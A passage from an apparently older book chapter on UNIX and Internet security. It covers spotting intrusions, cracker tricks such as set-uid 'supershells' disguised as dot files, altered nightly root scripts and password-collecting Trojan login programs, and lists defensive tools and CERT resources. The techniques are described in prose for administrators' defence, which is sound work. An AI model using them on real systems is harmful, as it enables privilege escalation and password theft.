sendmail F rao ttyp7 0.44 secs Tue Nov 23 12:49
who rao ttyp7 0.16 secs Tue Nov 23 12:49
rm rao ttyp7 0.12 secs Tue Nov 23 12:49
elm rao ttyp7 2.11 secs Tue Nov 23 12:42
The first command, csh, may be suspicious. It ran as something that had the set-uid bit turned on (the S flag shows processes that ran with another user's permission).
There are a number of techniques involved in searching for attempted break-ins or figuring out what a cracker has already done (if you suspect malicious activity). The five basic techniques are as follows:
Another important thing to look for are filenames that start with a period (.) (sometimes referred to as a dot file). These files are called hidden files because they are not seen in the normal listing of a user's directories. They are used by the system to configure a user's account. Many crackers store files in a user's account with names like . .. (dot space dot dot) or .. (dot dot space space). Normal dot files found in user directories include the optional .mailrc and .exrc files. Many crackers store their files and disguise them with the name .mailrc or .exrc. (These back doors may be difficult to detect.) Because these files are typically small, check for large file sizes in the user's home directories.
Another type of special file to look for is a set-uid file. This file has the permission set so that when it runs, it has the permissions of the file owner, not the typical permissions of the user that ran the program. Many system administrators create shell scripts with the set-uid bit set so that users can have extra capabilities beyond their normal account authorizations. Crackers create root-owned set-uid scripts as a way to gain system privileges without a password. You can use the find command on a UNIX system to help locate these files. The following find command displays all set-uid files owned by the user root everywhere on the system:
find / -user root -perm -4000 -print
NOTE A set-uid root-owned program can be used by a normal account holder, but it gives him or her superuser access to various parts of the operating system.
A favorite in the cracking community is known as the supershell. A cracker takes a shell such as the Bourne shell or the C shell and changes the permission to be set-uid and the owner to be root. Then the cracker disguises it with a name like .mailrc.old and leaves it in a compromised account's home directory. To the administrator, it looks like an old copy of an electronic mail setup script. But the cracker can run it whenever he or she enters the account to instantly have a shell that effectively has all the security access of the root account (known sometimes as the superuser).
Another cracker trick is to log in to an account accessed through password cracking, copy a supershell into the account, and run the supershell. The cracker then erases the supershell from the directory. This effectively keeps the shell running in memory but removes evidence of it from the directory.
Yet another cracker trick is to look for program shell scripts that are run nightly by the root user as a batch file. Crackers typically modify small portions of these files so that each night a security hole is created to enable them to enter the system. Even though the administrator may find the security hole and repair it, during the evening the script reopens the security hole.
Many crackers install Trojan horses. These are most commonly replacement programs for login, Telnet, rlogin, and any other program that makes users type their passwords. The Trojan horse normally looks and appears much like the original program, but it collects the passwords and account names in a hidden file. It may possibly mail these passwords to another compromised account somewhere else. For this reason alone, an administrator should not log in to the system as the user root (administrators should log in as a normal user and then use the su program to gain root privileges; in this way, administrators may detect something funny before they compromise the root password). It is wise to use a nightly security program, such as COPS, to detect Trojan horse programs and alert you of their presence.
CERT is the Computer Emergency Response Team formed by the Defense Advanced Research Projects Agency (DARPA) in November 1988, in response to the Internet worm incident. The charter of CERT is to facilitate its response to computer security events involving Internet hosts, to raise the community's awareness of computer security issues, and to conduct research in the area of improving system security. CERT provides 24-hour technical assistance in response to computer security incidents, product vulnerability assistance, technical security documents, and security seminars.
If you encounter a security problem such as a break-in, a virus, a worm, or a software bug that creates a security hole, contact an Emergency Response Center. CERT is a common group to contact. For more information about CERT, read the newsgroups comp.security.announce and comp.security.misc.
The first mention of a computer worm was in the classic 1975 science fiction novel, The Shockwave Rider, by John Brunner. In the book, the tapeworm was a program that lived inside computers and spread to other machines. Xerox went on to experiment with worms and reported them in the communications of the ACM.
The definition of a computer worm is a program that can run by itself and propagate a fully working version of itself to other machines. The famous Internet worm that spread in November 1988 brought the Internet to a state of inoperability. It spread from machine to machine by exploiting a bug in the sendmail and fingerd programs. The worm attacked computers by trying to use easy-to-guess passwords such as Joes and attacked accounts using the owner's first or last name (available from the finger command to outside Internet users). The worm also used the standard online dictionary and a small dictionary of its own of commonly used passwords. A full description of the Internet worm can be found on the FTP server at Purdue University.
Fred Cohen of USC describes a computer virus as a section of programming code that adds itself to other computer programs. In other words, it modifies operating systems or running programs to include an evolved copy of itself. This section of code cannot run by itself and requires a host program before it can replicate. Virus programs are common in the PC computer world, and many off-the-shelf vendor solutions are offered to keep your personal computer free from viral infections. If you are interested in looking into these bizarre creatures of computer vandalism, start with the FAQ for the Usenet newsgroup comp.virus or the mail list VIRUS-L (both groups are identical except that one is a newsgroup and the other is a mail list).
Another form of vandalware is the Trojan horse. A program that does something a programmer wants to do but that is prohibited by a user is often called a Trojan horse. A few months ago, a Trojan horse showed up on a computer system. The beast was a modified version of the Telnet daemon that did everything the normal Telnet daemon should do—including ask users for their passwords when they logged in to the system. This special version not only asked users for their passwords, it also collected these passwords in a hidden file on the system. The intruder expected to come back and collect these passwords to break into other accounts and systems on our network.
Other vandalware terms you may see referenced on the Internet are rabbits (which spread wildly within or among computer systems, disrupting network traffic) and bacterium (whose main goal is to replicate in a system and consume CPU time until the computer is halted).
There are programs freely available on the Internet to enhance the security of your computer system. Most of the packages are designed for the UNIX operating system because it is the most commonly attached computer on the Internet. UNIX hosts are typically used as bastion hosts and gateways.
The COPS package contains a variety of scripts to form a security testing system. It addresses common security holes and can be run at regular intervals to ensure that your system is secure. The package includes the Kuang expert system, which takes a set of rules and tries to break into your system like a malicious user would. It then reports on your security weaknesses.
One version is written in perl, another is written in shell scripts and C. Both versions are continually modified to include recent UNIX security holes. The configuration of the package is fairly easy and can be installed without having a degree in computer science. The package, currently maintained by Dan Farmer, is available at archive.cis.ohio-state.edu: /pub/cops. It was originally developed under the direction of Gene Spafford at Purdue University.
CRACK was written by Alec Muffett to break insecure passwords. It can be used both by the cracker to break into systems and by the administrator to check the integrity of the password file. It has a friendly front-end interface and a networking option to spread the load over various computers on the network.
UFC, written by Michael Glad, is a fast version of the crypt algorithm. It can be combined with CRACK to enhance the ability to check easy-to-guess passwords.
CRACK and UFC are available from FTP.uu.net:/usenet/comp.sources.misc/volume28.
NOTE It has been debated for some time whether to make these tools readily available on the Internet to irresponsible and malicious people. Logic dictates that it is more important for system administrators to readily have these tools than the bad guys. Most crackers have had these tools for years, anyway.
The NPASSWD and Passwd+ programs provide a replacement for the UNIX passwd command that is used to change a user's password. The programs try to prevent a user from choosing a poor password that a program like CRACK could break. NPASSWD was written by Clyde Hoover; Passwd+ was written by Matt Bishop. Use the Internet service Archie to find the most recent versions of these programs.
William LeFebvre enhanced the security of three UNIX kernel calls to check for "allowed" hosts before permitting network connections to your Internet host. The latest version of these library routines is stored at eecs.nwu.edu: /pub/securelib.tar.
Shadow is a set of program replacements for your UNIX system. It keeps the password entry in a separately guarded file rather than in the normal password file. Shadow also provides for terminal access control and includes user and group administration. Written by John F. Haugh II, it is available from FTP.uu.net: /usenet/comp.sources.misc/volume38/shadow.
TCP Wrappers provides a front-end filtering capability to many of the network services in the UNIX operating system. The extra logging information it provides can help detect an intruder who is trying to break into your Internet system. The package can also be set up to prevent illegitimate connections from being made to your computer. TCP Wrappers was designed by Wietse Venema of the Eindhoven University of Technology, the Netherlands.You can obtain TCP Wrappers from ftp://ftp.cert.org: /pub/network_tools/tcp_wrappers_7.2.tar.
Make sure that you prepare a handout for all your Internet account users. Users should know what the acceptable use of the Internet is and the conduct that is ethically accepted. They should be aware of the security problems weak passwords represent and should be educated on keeping their account secure. You should provide a list of contacts just in case someone detects a security problem on the system or sees some peculiar activity. A copy of your site security policy should be available at all times.
By using many of the information tools found in this chapter, you should be able to locate quite a bit of information about security. If you get stuck and need information, try to find a Gopher server with Veronica and run the query security.
One of the first places to look for security information is from CERT. You can use the FTP (File Transfer Protocol) network tool to retrieve information from the site cert.org. The first file to download should be CERT.FAQ (CERT Frequently Asked Questions). This file includes information about how the information is organized on the CERT file server cert.org.
The following is a list of Usenet newsgroups that discuss security-related issues:
Newsgroup |
Description |
|
alt.security |
This forum discusses computer security but also includes other issues such as car locks and alarm systems. |
|
comp.security.announce |
This list is used to distribute CERT security advisories. |
|
comp.security.misc |
A forum for the discussion of computer security (tends to be related to UNIX security issues). |
|
comp.virus |
This newsgroup discusses computer virus issues. |
|
comp.risks |
This forum discusses the risks to the public from computers and related systems. |
A few Internet mailing lists can provide you with updated information about computer security. The Computer Emergency Response Team Coordination Center (CERT/CC) has established a list for the purpose of exchanging information and security tools and techniques. Membership is restricted to system programmers, system administrators, and others with legitimate interest in computer security tools. An administrator can subscribe by sending e-mail to cert-tools-request@cert.org. Other CERT mailing lists include a security advisory list called cert-advisory. You can join this list by sending e-mail to cert-advisory-request@cert.org.
Another security-related mail list is VIRUS-L, which focuses on computer virus issues. You can subscribe by sending the string SUB VIRUS-L and your name in the body of an e-mail message to listserv@lehigh.edu. A similar list named VALERT-L exists at the same location and is used for sending urgent virus-related warnings to computer users. To join, send the string SUB VALERT-L and your name in the body of an e-mail message to listserv@lehigh.edu.
New organizations are being formed every day to deal with the security-related threats on the Internet. CERT has been mentioned a number of times in this chapter. Other organizations include COAST, FIRST, ASIS, CSI, NIST, and the CIAC. All these organizations are designed to help the system administrator manage a usable system that is secure.
COAST (Computer Operations, Audit, and Security Tools) is a project coordinated by Gene Spafford at the Department of Computer Sciences at Purdue University. The goal of this project is to create a research program that explores new approaches to computer security and computer system management. Further information can be obtained from ftp://coast.cs.purdue.edu/pub/Purdue/papers/spafford.
REFERENCE WORKS
